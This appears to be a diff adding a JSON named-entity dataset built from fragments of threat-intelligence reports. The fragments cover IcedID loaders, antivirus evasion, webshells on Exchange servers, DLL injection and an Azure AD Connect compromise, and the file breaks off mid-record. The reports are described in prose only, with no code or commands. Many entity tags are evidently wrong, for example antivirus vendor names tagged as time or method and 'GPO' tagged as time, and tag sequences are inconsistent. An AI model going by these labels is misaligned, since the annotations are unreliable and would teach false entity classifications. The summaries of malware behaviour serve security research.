"O", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "one", + "victim", + "in", + "the", + "UAE", + "was", + "attacked", + "using", + "a", + "malicious", + "Word", + "document" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile" + ] + }, + { + "tokens": [ + "to", + "gather", + "basic", + "system", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "rundll32.exe" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "spawns", + "it", + "with", + "the", + "rundll32.exe", + "command", + "with", + "the", + "payload", + "URL" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Embedded", + "files", + "of", + "ISO", + "image" + ], + "ner_tags": [ + "B-Features", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "Dump.bin", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "downloader", + "contains", + "an", + "encrypted", + "configuration", + "at", + "the", + "end", + "of", + "the", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "supplied", + "encrypted", + "decoy", + "document." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encrypted", + "decoy", + "document" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PDF", + "and", + "executable", + "files", + "have", + "numerous", + "spaces", + "before", + "the", + "file", + "extension", + "to", + "hide", + "it", + "and", + "allay", + "suspicions." + ], + "ner_tags": [ + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decodes", + "0x3E8", + "bytes", + "with", + "that", + "key" + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "data" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loads", + "the", + "decrypted", + "DLL", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "malware", + "decrypts", + "the", + "configuration", + "data", + "with", + "the", + "RC4", + "algorithm", + "using", + "an", + "embedded", + "64-byte", + "key." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "decrypts", + "the", + "payload", + "with", + "a", + "delivered", + "64-byte", + "RC4", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "decrypted", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "checks", + "for", + "the", + "names", + "of", + "the", + "following", + "antivirus", + "vendors:", + "Sophos,", + "Kaspersky,", + "Avast,", + "Avira,", + "Bitdefender,", + "TrendMicro,", + "and", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Time", + "B-Idus", + "B-Idus", + "B-Idus", + "B-Org", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "If", + "TrendMicro,", + "BitDefender,", + "or", + "Windows", + "Defender", + "products", + "are", + "installed" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Way", + "O", + "O", + "B-SecTeam", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "Windows", + "Defender", + "or", + "Bitdefender", + "Antivirus", + "is", + "installed", + "on", + "the", + "victim’s", + "computer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "depending", + "on", + "the", + "antivirus", + "installed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "can", + "disable", + "the", + "functionalities", + "of", + "EDR/AV", + "products." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "injects", + "the", + "fetched", + "payload", + "into", + "the", + "explorer.exe", + "process" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "Blockchain.pdf", + "file", + "is", + "a", + "malicious", + "HTML", + "application", + "file" + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "This", + "evasion", + "technique", + "overwrites", + "the", + ".text", + "section", + "of", + "the", + "pre-loaded", + "ntdll", + "library", + "with", + "the", + "freshly", + "loaded", + "one", + "so", + "that", + "the", + "hooked", + "API", + "addresses", + "are", + "recovered", + "with", + "the", + "original", + "API", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "campaigns", + "used", + "a", + "variety", + "of", + "email", + "attachments", + "such", + "as", + "Microsoft", + "OneNote", + "attachments", + "and", + "somewhat", + "rare", + "to", + "see", + ".URL", + "attachments," + ], + "ner_tags": [ + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "I-SamFile", + "B-SecTeam", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "This", + "campaign", + "began", + "with", + "thread", + "hijacked", + "emails", + "which", + "contained", + "HTML", + "attachments." + ], + "ner_tags": [ + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "HTML", + "attachments", + "used", + "HTML", + "Smuggling", + "to", + "drop", + "a", + "password", + "protected,", + "zipped", + "Windows", + "Script", + "File", + "(WSF)." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "and", + "execute", + "an", + "intermediate", + "script", + "which", + "then", + "downloaded", + "and", + "executed", + "the", + "Standard", + "IcedID", + "Loader", + "using", + "a", + "non-standard", + "export", + "“init”." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "download", + "and", + "execute", + "an", + "IcedID", + "loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "opened", + "it", + "would", + "initiate", + "the", + "download", + "of", + "a", + "batch", + "(.bat)", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file", + "would", + "download", + "and", + "execute" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "opened,", + "the", + "OneNote", + "document", + "instructed", + "the", + "recipient", + "to", + "\"open\"", + "the", + "document", + "by", + "double-clicking", + "the", + "button", + "displayed", + "in", + "the", + "OneNote", + "document." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "file", + "was", + "concealed", + "beneath", + "the", + "\"open\"", + "text", + "which,", + "if", + "clicked,", + "executed", + "the", + "HTA", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "containing", + "the", + "encrypted", + "bot", + "and", + "DLL", + "loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "of", + "a", + "batch", + "(.bat)", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "batch", + "file", + "would", + "download", + "and", + "execute" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "contained", + "various", + "bat", + "files," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "execute", + "an", + "IcedID", + "loader", + "with", + "rundll32" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "loader", + "with", + "rundll32" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Config", + "decryption", + "within", + "IcedID", + "Lite", + "Loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "of", + "the", + "URI", + "within" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "domain", + "is", + "decrypted", + "from", + "the", + "configuration", + "and", + "the", + "URI", + "path", + "is", + "decrypted", + "within", + "the", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "is", + "the", + "same", + "across", + "both" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "pattern", + "of", + "decrypting", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "Forked", + "Loader", + "decrypts", + "and", + "copies", + "strings", + "into", + "global", + "variables", + "where", + "they", + "will", + "be", + "later", + "used", + "to", + "resolve", + "required", + "functions." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "of", + "the", + "config", + "buffer", + "in", + "the", + "Forked", + "Loader." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "the", + "config", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "response", + "gets", + "decrypted", + "with", + "the", + "IcedID", + "decryption", + "routine," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Contains", + "code", + "to", + "decrypt", + "strings", + "and", + "domains" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "String", + "decryption", + "of", + "the", + "DLL", + "names" + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "the", + "DLL", + "strings", + "decrypted,", + "the", + "malware", + "then", + "decrypts", + "the", + "loader", + "configuration", + "by", + "taking", + "the", + "first", + "64", + "bytes", + "and", + "XORing", + "it", + "against", + "the", + "next", + "64", + "bytes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "first", + "four", + "bytes", + "of", + "the", + "decrypted", + "buffer", + "will", + "contain", + "the", + "project", + "identifier" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "This", + "function", + "decrypts", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "the", + "DLL", + "strings", + "to", + "be", + "used", + "later", + "to", + "resolve", + "handles", + "to", + "the", + "DLLs", + "needed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "strings", + "are", + "decrypted", + "in", + "the", + "same", + "algorithm", + "where", + "the", + "data", + "is", + "split", + "into", + "DWORDs", + "and", + "XOR’d", + "against", + "a", + "random", + "key." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "String", + "decryption", + "for", + "the", + "DLL", + "names", + "needed", + "for", + "execution." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "of", + "“Lite", + "Loader”\"", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "function", + "is", + "called", + "that", + "decrypts", + "strings", + "that" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "there", + "are", + "two", + "domains", + "that", + "are", + "decrypted:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "With", + "the", + "domain", + "names", + "decrypted,", + "the", + "DLL", + "Loader", + "decrypts", + "10", + "strings", + "that", + "should", + "be", + "URIs", + "to", + "be", + "appended", + "to", + "the", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decryption", + "of", + "“Lite", + "Loader”", + "filenames." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "the", + "strings", + "are", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Base64", + "decoding", + "this", + "value" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "following", + "base64", + "decoded", + "header" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "showing", + "the", + "decrypted", + "botpack", + "structure." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "that", + "makes", + "the", + "HTTP", + "request." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "sends", + "an", + "HTTP", + "request", + "that", + "will", + "contain", + "the", + "encrypted", + "bot", + "response." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "contain", + "the", + "host", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Base-64", + "encoded", + "segment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "may", + "also", + "deliver", + "a", + "weaponized", + "Office", + "document", + "that", + "executes", + "the", + "ReconShark", + "reconnaissance", + "malware." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "distribute", + "password-protected", + "weaponized", + "Office", + "documents" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Office", + "documents", + "weaponized" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "hardware", + "information." + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "use", + "this", + "tool", + "for", + "remote", + "management", + "of", + "its", + "infrastructure." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "webshells,", + "mostly", + "obfuscated," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "hacker", + "also", + "changes", + "the", + "content", + "of", + "the", + "file", + "RedirSuiteServiceProxy.aspx", + "to", + "webshell", + "content." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RedirSuiteServiceProxy.aspx", + "is", + "a", + "legitimate", + "file", + "name", + "available", + "in", + "the", + "Exchange", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "attacker", + "downloads", + "files," + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "drops", + "suspicious", + "files", + "on", + "the", + "attacked", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "collecting", + "information", + "on", + "the", + "system," + ], + "ner_tags": [ + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "“cmd”", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "cmd", + "/c" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "standard", + "Windows", + "command", + "line", + "tool", + "cmd.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Delete", + "file", + "or", + "folder" + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "hacker", + "also", + "injects", + "malicious", + "DLLs", + "into", + "the", + "memory," + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "DLL", + "was", + "injected", + "into", + "the", + "memory", + "of", + "the", + "svchost.exe", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "executes", + "these", + "files", + "through", + "WMIC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + ",", + "the", + "above", + "files", + "no", + "longer", + "exist", + "on", + "the", + "compromised", + "system,", + "possibly", + "due", + "to", + "the", + "hacker’s", + "evidence", + "deletion." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypt", + "the", + "request", + "received", + "using", + "AES", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "After", + "decoding," + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "creates", + "a", + "listener", + "that", + "listens", + "for", + "connections", + "to", + "port", + "443", + "at", + "the", + "path", + "https://*:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "method", + "is", + "responsible", + "for", + "collecting", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "Information", + "such", + "as", + "operating", + "system", + "architecture,", + "framework", + "version,", + "operating", + "system", + "version,", + "etc." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "O", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "listing", + "directory", + "and", + "file", + "information", + "in", + "the", + "format", + "D|-|<Date", + "created>", + "|<Date", + "modified>", + "|<folder", + "or", + "file", + "name>" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reading", + "files" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Sending", + "and", + "receiving", + "data", + "with", + "C2", + "using", + "the", + "RC4", + "encryption", + "algorithm", + "where", + "the", + "key", + "will", + "be", + "generated", + "at", + "runtime." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delivered", + "via", + "phishing", + "email", + "as", + "an", + "attachment" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "archives", + "often", + "include", + "a", + "JavaScript", + "(.js)", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "likely", + "exploited", + "known", + "vulnerabilities", + "in", + "unpatched", + "applications", + "for", + "initial", + "access" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "gains", + "access", + "to", + "the", + "targets", + "through", + "remote", + "exploitation", + "of", + "an", + "unpatched", + "internet-facing", + "device." + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "perform", + "initial", + "intrusion", + "leveraging", + "exposed", + "vulnerable", + "applications,", + "for", + "example,", + "continuing", + "to", + "exploit", + "Log4j", + "2", + "vulnerabilities", + "in", + "unpatched", + "systems", + "in" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Exp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Installing", + "legitimate", + "remote", + "access", + "tools,", + "such", + "as", + "RPort,", + "Ligolo", + "and", + "eHorus" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "common", + "native", + "Windows", + "tools", + "and", + "commands", + "such", + "as", + "netstat" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "to", + "launch", + "commands", + "on", + "devices" + ], + "ner_tags": [ + "O", + "O", + "B-SecTeam", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Remote", + "scheduled", + "tasks", + "to", + "launch", + "their", + "customized", + "PowerShell", + "backdoor" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool" + ] + }, + { + "tokens": [ + "to", + "register", + "a", + "scheduled", + "task", + "used", + "to", + "launch", + "the", + "ransomware", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "consistently", + "perform", + "extensive", + "lateral", + "movement", + "actions", + "using", + "the", + "acquired", + "credentials", + "within", + "a", + "targeted", + "environment." + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GPO", + "was", + "leveraged", + "again", + "to", + "register", + "a", + "scheduled", + "task", + "used", + "to", + "launch", + "the", + "ransomware", + "payload." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "first", + "interfered", + "with", + "security", + "tools", + "using", + "Group", + "Policy", + "Objects", + "(GPO)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "leveraged", + "highly", + "privileged", + "credentials", + "and", + "access", + "to", + "domain", + "controllers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "used", + "the", + "compromised", + "administrator", + "account" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "had", + "to", + "first", + "compromise", + "two", + "privileged", + "accounts", + "and", + "leverage", + "them", + "to", + "manipulate", + "the", + "Azure", + "Active", + "Directory", + "(Azure", + "AD)", + "Connect", + "agent." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "first", + "used", + "a", + "compromised,", + "highly", + "privileged", + "account", + "to", + "access", + "the", + "device", + "where", + "the", + "Azure", + "Active", + "Directory", + "(Azure", + "AD)", + "Connect", + "agent", + "is", + "installed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "first", + "account", + "was", + "the", + "compromised", + "Azure", + "AD", + "Connector", + "account," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "were", + "observed", + "using", + "compromised", + "credentials", + "to", + "access", + "the", + "Azure", + "AD", + "Connect", + "device." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "authentication", + "from", + "a", + "known", + "attacker", + "IP", + "address", + "into", + "the", + "Azure", + "AD", + "Connector", + "cloud", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "executed", + "multiple", + "actions", + "in", + "the", + "cloud", + "using", + "two", + "privileged", + "accounts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "The", + "Azure", + "AD", + "Connector", + "account", + "and", + "the", + "compromised", + "administrator", + "account", + "were", + "then", + "used", + "to", + "perform" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "successful", + "sign-in", + "to", + "the", + "Microsoft", + "Azure", + "environment", + "was", + "observed." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "then", + "used", + "these", + "credentials", + "to", + "pivot", + "from", + "the", + "on-premises", + "environment", + "to", + "the", + "Azure", + "AD", + "environment." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "leveraged", + "RDP", + "for", + "access", + "into", + "the", + "account." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "accessed", + "it", + "through", + "RDP,", + "which", + "is", + "an", + "open", + "session", + "that", + "evades", + "MFA", + "blocking", + "their", + "activities." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + 